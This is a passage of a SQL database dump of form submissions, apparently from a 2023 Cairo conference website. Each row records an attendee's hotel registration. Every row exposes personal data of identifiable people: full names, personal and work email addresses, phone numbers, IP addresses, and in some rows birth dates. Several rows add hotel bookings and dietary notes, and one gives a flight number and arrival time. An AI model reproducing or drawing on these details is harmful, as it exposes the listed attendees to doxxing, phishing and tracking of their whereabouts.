(63,1,63,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"0bfb516be6\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Lucie\",\"last_name\":\"Kupková\"},\"country-list\":\"CZ\",\"subject_2\":\"Charles University Prague\",\"input_text\":\"+420605281181\",\"email\":\"lucie.kupkova@natur.cuni.cz\",\"numeric-field\":\"1131\",\"subject_1\":\"Grand Nile Tower Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','78.80.80.210',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 16:21:33','2023-08-29 16:21:33'),
(64,1,64,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"0bfb516be6\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Karam\",\"last_name\":\"Mawas\"},\"country-list\":\"DE\",\"subject_2\":\"University of Braunschweig Institute of Geodesy and Photogrammetry\",\"input_text\":\"0049 531 391 94582\",\"email\":\"k.mawas@tu-bs.de\",\"numeric-field\":\"1472\",\"subject_1\":\"Ramses Hilton hotel, 1115 Corniche El NileCairo, Egypt\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','95.90.190.137',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 18:50:22','2023-08-29 18:50:22'),
(65,1,65,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"0bfb516be6\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"Jónatas\",\"last_name\":\"Valença\"},\"country-list\":\"PT\",\"subject_2\":\"CERIS, Univ. Lisboa\",\"input_text\":\"+351 918823733\",\"email\":\"jonatas.valenca@tecnico.ulisboa.pt\",\"numeric-field\":\"803\",\"subject_1\":\"City View Hotel, 1 Al Bustan St, Ismailia, Qasr El Nil, Cairo Governorate 4272101, Egito\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Any\",\"message\":\"I think I can walk to the conference venue. Thanks\",\"datetime\":\"24\\/04\\/1980\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','188.37.228.92',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 19:24:34','2023-08-29 19:24:34'),
(66,1,66,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"0bfb516be6\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Ajeet\",\"last_name\":\"Kumar\"},\"country-list\":\"IN\",\"subject_2\":\"Researcher in Italy\",\"input_text\":\"+918210067477 (whatsapp)\",\"email\":\"ajeet.kumar.in@ieee.org\",\"numeric-field\":\"1907\",\"subject_1\":\"Flamenco Cairo Hotel\",\"Check_in_Date\":\"04\\/08\\/2023\",\"description\":\"Preferably Vegetarian Asian Food.\",\"message\":\"Dear Concerned Authority,\\r\\n     I will reach the hotel on the 4th of September and continuously attend the conference on the 5th, 6th and 7th of September. Please arrange a travel vehicle for me from the Hotel to the Conference venue at around 9 am on the 5th, 6th and 7th of September, and in the evening after completion of the sessions for all the said days.\\r\\n\\r\\nI really appreciate your support in this.\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','93.40.77.201',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-29 22:19:46','2023-08-29 22:19:46'),
(67,1,67,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"yuhang\",\"last_name\":\"xu\"},\"country-list\":\"CN\",\"subject_2\":\"Wuhan University\",\"input_text\":\"+86 15353445973\",\"email\":\"1728572230@qq.com\",\"numeric-field\":\"185\",\"subject_1\":\"InterContinental Cairo Semiramis\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','192.74.229.114',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 11:13:28','2023-08-30 11:13:28'),
(68,1,68,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"SHANGZHE\",\"last_name\":\"SUN\"},\"country-list\":\"CN\",\"subject_2\":\"Wuhan University\",\"input_text\":\"+8615927225466\",\"email\":\"sszoo@foxmail.com\",\"numeric-field\":\"178\",\"subject_1\":\"InterContinental Cairo Semiramis\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Chinese Food\",\"message\":\"Best Wishes to you all!\",\"datetime\":\"02\\/09\\/1997\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','118.167.10.126',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 12:07:57','2023-08-30 12:07:57'),
(69,1,69,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Juan Pablo\",\"last_name\":\"Duque Ordonez\"},\"country-list\":\"CO\",\"subject_2\":\"Politecnico di Milano\",\"input_text\":\"+393517319088\",\"email\":\"juanpablo.duque@polimi.it\",\"numeric-field\":\"1407\",\"subject_1\":\"Tahrir Plaza Suites\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','37.160.155.156',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 12:16:37','2023-08-30 12:16:37'),
(70,1,70,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Angelly de Jesus\",\"last_name\":\"Pugliese Viloria\"},\"country-list\":\"CO\",\"subject_2\":\"Politecnico di Milano\",\"input_text\":\"+393517351508\",\"email\":\"angellyde.pugliese@polimi.it\",\"numeric-field\":\"1425\",\"subject_1\":\"Tahrir Plaza Suites\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','37.160.155.156',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 12:19:29','2023-08-30 12:19:29'),
(71,1,71,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Zongliang\",\"last_name\":\"Zhang\"},\"country-list\":\"CN\",\"subject_2\":\"Jimei University\",\"input_text\":\"+8615980262300\",\"email\":\"zzl@jmu.edu.cn\",\"numeric-field\":\"1548\",\"subject_1\":\"InterContinental Cairo Semiramis\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"26\\/04\\/1986\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','118.163.68.162',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 13:13:58','2023-08-30 13:13:58'),
(72,1,72,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"Ma Bea Angela\",\"last_name\":\"Zamora\"},\"country-list\":\"PH\",\"subject_2\":\"University of the Philippines - Diliman\",\"input_text\":\"+639273572322\",\"email\":\"mizamora@up.edu.ph\",\"numeric-field\":\"1137\",\"subject_1\":\"Ramses Hilton Hotel\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Anything with rice! Not a fan of spicy food.\",\"message\":\"Thank you for the opportunity! Hoping for the great success of this event!\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','136.158.0.72',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 13:41:44','2023-08-30 13:41:44'),
(73,1,73,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Michele\",\"last_name\":\"Crosetto\"},\"country-list\":\"IT\",\"subject_2\":\"CTTC\",\"input_text\":\"0034695560351\",\"email\":\"mcrosetto@cttc.cat\",\"numeric-field\":\"1101\",\"subject_1\":\"NOVOTEL CAIRO EL BORG\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','84.88.62.131',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 13:50:55','2023-08-30 13:50:55'),
(74,1,74,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Abdullah\",\"last_name\":\"Almuthibi\"},\"country-list\":\"SA\",\"subject_2\":\"Ministry of Environment Water and Agriculture\",\"input_text\":\"966553020610\",\"email\":\"aalmuthibi@ncvc.gov.sa\",\"numeric-field\":\"4\",\"subject_1\":\"Four Seasons Hotel Cairo at Nile Plaza\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"نشكركم على تنظيم هذا المؤتمر، وتنمنى لكم التوفيق\\r\\nكما أود أن اسأل عن التسهيلات المتوفرة لديكم للزوار الممثلين لجهات حكومية من المملكة العربية السعودية\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Apple','37.42.56.18',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 15:43:40','2023-08-30 15:43:40'),
(75,1,75,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"e2035dc4b9\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"Elizaveta\",\"last_name\":\"Spiridonova\"},\"country-list\":\"RU\",\"subject_2\":\"Agisoft LLC\",\"input_text\":\"+79647089827\",\"email\":\"e.spiridonova@agisoft.com\",\"numeric-field\":\"2200\",\"subject_1\":\"Cleopatra Hotel, 2 Al Bustan street, Downtown, Cairo\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"Agisoft team (4 people):\\r\\nDiana Ovod\\r\\nElizaveta Spiridonova\\r\\nNikolai Poliarnyi \\r\\nTerekhov Anton\\r\\n\\r\\nPeriod of stay: 01.09.23 - 09.01.23\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','83.171.91.97',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 16:26:02','2023-08-30 16:26:02'),
(76,1,76,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Bolelang\",\"last_name\":\"Sibolla\"},\"country-list\":\"ZA\",\"subject_2\":\"Council for Scientific and Industrial Research - CSIR\",\"input_text\":\"+27-72-371-5992\",\"email\":\"bsibolla@csir.co.za\",\"numeric-field\":\"1322\",\"subject_1\":\"Steigenberger Hotel El Tahrir Cairo\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','146.64.25.180',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 16:38:14','2023-08-30 16:38:14'),
(77,1,77,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Pedro Marco\",\"last_name\":\"Achanccaray Diaz\"},\"country-list\":\"PE\",\"subject_2\":\"Technical University of Braunschweig\",\"input_text\":\"+4915155394325\",\"email\":\"p.diaz@tu-braunschweig.de\",\"numeric-field\":\"332\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Chicken\",\"message\":\"\",\"datetime\":\"09\\/05\\/1989\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','134.169.73.191',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 17:00:37','2023-08-30 17:00:37'),
(78,1,78,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Miss.\",\"names\":{\"first_name\":\"Diana\",\"last_name\":\"Ovod\"},\"country-list\":\"RU\",\"subject_2\":\"Agisoft LLC\",\"input_text\":\"+79052567986\",\"email\":\"diana.ovod@agisoft.com\",\"numeric-field\":\"2186\",\"subject_1\":\"Cleopatra Hotel, 2 Al Bustan street, Downtown, Cairo\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','83.171.91.97',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 18:52:55','2023-08-30 18:52:55'),
(79,1,79,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Nikolai\",\"last_name\":\"Poliarnyi\"},\"country-list\":\"RU\",\"subject_2\":\"Agisoft LLC\",\"input_text\":\"+79119591170\",\"email\":\"polarhare@gmail.com\",\"numeric-field\":\"2189\",\"subject_1\":\"Cleopatra Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"gluten-free\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Linux','83.171.91.97',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 20:21:49','2023-08-30 20:21:49'),
(80,1,80,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Anton\",\"last_name\":\"Terekhov\"},\"country-list\":\"RU\",\"subject_2\":\"Agisoft LLC\",\"input_text\":\"+996550750079\",\"email\":\"a.terekhov@agisoft.com\",\"numeric-field\":\"2204\",\"subject_1\":\"Сleopatra Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Linux','46.251.212.190',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 22:03:49','2023-08-30 22:03:49'),
(81,1,81,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Mustafa Can\",\"last_name\":\"Ozkan\"},\"country-list\":\"TR\",\"subject_2\":\"University College London\",\"input_text\":\"+44 0 74 6789 7777\",\"email\":\"ucesmco@ucl.ac.uk\",\"numeric-field\":\"1598\",\"subject_1\":\"Hilton Ramses\",\"Check_in_Date\":\"02\\/08\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"04\\/05\\/1992\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','144.82.114.244',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 22:39:33','2023-08-30 22:39:33'),
(82,1,82,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"\",\"last_name\":\"\"},\"country-list\":\"CN\",\"subject_2\":\"University of Warwick\",\"input_text\":\"07421726001\",\"email\":\"rui.li.4@warwick.ac.uk\",\"numeric-field\":\"1530\",\"subject_1\":\"Hilton\",\"Check_in_Date\":\"01\\/08\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'iPhone','iPhone','31.51.72.83',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 22:41:23','2023-08-30 22:41:23'),
(83,1,83,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"56a2c04e35\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Eng.\",\"names\":{\"first_name\":\"Nicole\",\"last_name\":\"Pascucci\"},\"country-list\":\"IT\",\"subject_2\":\"University of L\'Aquila\",\"input_text\":\"+39 3408620224\",\"email\":\"nicole.pascucci@graduate.univaq.it\",\"numeric-field\":\"1532\",\"subject_1\":\"Novotel Cairo El Borg\",\"Check_in_Date\":\"03\\/09\\/2023\",\"description\":\"\",\"message\":\"\",\"datetime\":\"10\\/11\\/1993\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','151.19.15.148',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-30 23:48:16','2023-08-30 23:48:16'),
(84,1,84,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"SEEMA\",\"last_name\":\"JALAN\"},\"country-list\":\"IN\",\"subject_2\":\"Mohanlal Sukhadia University, Udaipur, Rajasthan, INDIA\",\"input_text\":\"+919887643513\",\"email\":\"seemajalan1@gmail.com\",\"numeric-field\":\"1521\",\"subject_1\":\"CAIRO CAPITAL PLAZA\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"INDIAN VEG\",\"message\":\"Please book a promotional Shuttle bus from the Airport to my Hotel (one way) at cost of $5 USD. We are three delegates from India and staying at Hotel Cairo Capital Plaza, 24, Kasr El Nile, Cairo. We will be arriving at CAIRO Airport Terminal 3  on 01 September, 2023 at 20.55 hrs by EGYPT-AIR airlines flight no. MS-976. \\r\\nPlease confirm the booking as early as possible. \\r\\nRegards\",\"datetime\":\"21\\/07\\/1975\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','122.179.116.125',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 06:38:48','2023-08-31 06:38:48'),
(85,1,85,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"SEEMA\",\"last_name\":\"JALAN\"},\"country-list\":\"IN\",\"subject_2\":\"Mohanlal Sukhadia University, Udaipur, Rajasthan, INDIA\",\"input_text\":\"+919887643513\",\"email\":\"seemajalan1@gmail.com\",\"numeric-field\":\"1521\",\"subject_1\":\"CAIRO CAPITAL PLAZA\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"INDIAN VEG\",\"message\":\"Please book a promotional Shuttle bus from the Airport to my Hotel (one way) at cost of $5 USD. We are three delegates from India and staying at Hotel Cairo Capital Plaza, 24, Kasr El Nile, Cairo. We will be arriving at CAIRO Airport Terminal 3  on 01 September, 2023 at 20.55 hrs by EGYPT-AIR airlines flight no. MS-976. \\r\\nPlease confirm the booking as early as possible. \\r\\nRegards\",\"datetime\":\"21\\/07\\/1975\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','122.179.116.125',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 06:38:56','2023-08-31 06:38:56'),
(86,1,86,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Prof.\",\"names\":{\"first_name\":\"SEEMA\",\"last_name\":\"JALAN\"},\"country-list\":\"IN\",\"subject_2\":\"Mohanlal Sukhadia University, Udaipur, Rajasthan, INDIA\",\"input_text\":\"+919887643513\",\"email\":\"seemajalan1@gmail.com\",\"numeric-field\":\"1521\",\"subject_1\":\"CAIRO CAPITAL PLAZA, 24, KASR AL NILE, CAIRO\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"INDIAN VEGETARIAN\",\"message\":\"If possible please arrange transportation bus from our hotel to the conference venue. We are 03 delegates from India staying in the hotel for the conference. \\r\\n\\r\\nThanks\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','122.179.116.125',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 06:45:04','2023-08-31 06:45:04'),
(87,1,87,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Vipasha\",\"last_name\":\"Sharma\"},\"country-list\":\"IN\",\"subject_2\":\"PhD Scholar\",\"input_text\":\"8628974193\",\"email\":\"v_sharma@ce.iitr.ac.in\",\"numeric-field\":\"1809\",\"subject_1\":\"Ramses Hilton Cairo\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Vegan\\/Vegetarian\",\"message\":\"Accompanied by my husband, Mr Tushar Bharadwaj\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','103.37.201.179',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 11:11:31','2023-08-31 11:11:31'),
(88,1,88,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Kimon\",\"last_name\":\"Papadimitriou\"},\"country-list\":\"GR\",\"subject_2\":\"Aristotle University of Thessaloniki\",\"input_text\":\"00306955500107\",\"email\":\"paki@auth.gr\",\"numeric-field\":\"2067\",\"subject_1\":\"PYRAMISA SUITES HOTEL & CASINO CAIRO\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Mediterranean\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Firefox','Windows','45.139.213.237',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 11:26:32','2023-08-31 11:26:32'),
(89,1,89,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Raymond\",\"last_name\":\"Molapo\"},\"country-list\":\"ZA\",\"subject_2\":\"Council for Scientific and Industrial Research\",\"input_text\":\"+27789444773\",\"email\":\"nkadi.ray@gmail.com\",\"numeric-field\":\"2080\",\"subject_1\":\"Steigenberger Hotel El Tahrir\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"\",\"message\":\"I am very excited and looking forward to the trip\",\"datetime\":\"15\\/03\\/1986\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Linux','146.64.217.26',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 12:31:12','2023-08-31 12:31:12'),
(90,1,90,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Lizwe\",\"last_name\":\"Mdakane\"},\"country-list\":\"ZA\",\"subject_2\":\"Council for Scientific and Industrial Research (CSIR)\",\"input_text\":\"+27612667375\",\"email\":\"lmdakane@csir.co.za\",\"numeric-field\":\"1172\",\"subject_1\":\"Steigenberger Hotel El Tahrir\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Meat\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','146.64.19.99',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 12:32:26','2023-08-31 12:32:26'),
(91,1,91,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"382b99204f\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Ms.\",\"names\":{\"first_name\":\"Shelley\",\"last_name\":\"Haupt\"},\"country-list\":\"ZA\",\"subject_2\":\"Council for Scientific and Industrial Research (CSIR)\",\"input_text\":\"+27618010934\",\"email\":\"shaupt@csir.co.za\",\"numeric-field\":\"1571\",\"subject_1\":\"Steingenberger Hotel El Tahrir\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Pasta, pizza\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','146.64.81.114',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 13:48:43','2023-08-31 13:48:43'),
(92,1,92,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"3946067dbf\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Dr.\",\"names\":{\"first_name\":\"Nicholas\",\"last_name\":\"HAMM\"},\"country-list\":\"DE\",\"subject_2\":\"University of Nottingham\",\"input_text\":\"+31654607838\",\"email\":\"nicholas.hamm@nottingham.edu.cn\",\"numeric-field\":\"1674\",\"subject_1\":\"Ramses Hilton\",\"Check_in_Date\":\"02\\/09\\/2023\",\"description\":\"Nice food\",\"message\":\"Thank you for your help.\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Windows','145.107.125.254',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 17:39:31','2023-08-31 17:39:31'),
(93,1,93,'{\"__fluent_form_embded_post_id\":\"5364\",\"_fluentform_1_fluentformnonce\":\"3946067dbf\",\"_wp_http_referer\":\"\\/index.php\\/2023\\/08\\/20\\/5364\\/\",\"input_radio\":\"Mr.\",\"names\":{\"first_name\":\"Bavantha\",\"last_name\":\"Udugama\"},\"country-list\":\"LK\",\"subject_2\":\"University of Twente\",\"input_text\":\"+3164748201\",\"email\":\"b.udugama@utwente.nl\",\"numeric-field\":\"1673\",\"subject_1\":\"Grand Nile Tower Hotel\",\"Check_in_Date\":\"01\\/09\\/2023\",\"description\":\"Meat-based food: I prefer authentic Egyptian food if possible.\",\"message\":\"\",\"datetime\":\"\"}','https://gsw2023.com/index.php/2023/08/20/5364/',0,'unread',0,'Chrome','Apple','130.89.228.93',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-31 17:47:38','2023-08-31 17:47:38'),
